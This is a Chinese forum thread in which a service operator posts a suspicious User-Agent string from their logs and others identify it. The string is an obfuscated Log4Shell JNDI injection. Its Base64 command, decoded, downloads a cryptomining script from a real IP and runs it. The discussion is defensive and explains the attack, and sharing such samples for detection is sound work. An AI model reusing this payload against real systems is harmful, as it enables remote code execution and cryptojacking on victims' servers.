年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')
知道这是干嘛的吗

1
ThirdFlame 2022 年 2 月 10 日
log4shell
|
3
zhazi 2022 年 2 月 10 日
|
4
maichaide 2022 年 2 月 10 日
下载脚本开启探矿服务
|
5
muzuiget 2022 年 2 月 10 日
Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
|
6
yundun2021 2022 年 2 月 10 日
有条件可以上 WAF
|
7
yu1u 2022 年 2 月 10 日
log4j 漏洞攻击
|
8
0x73346b757234 2022 年 2 月 10 日
对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
|
11
kaka6 OP 又收到不少的 User-Agent:
Go-http-client/1.1 python-requests/2.20.1 curl/7.75.0 而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客 |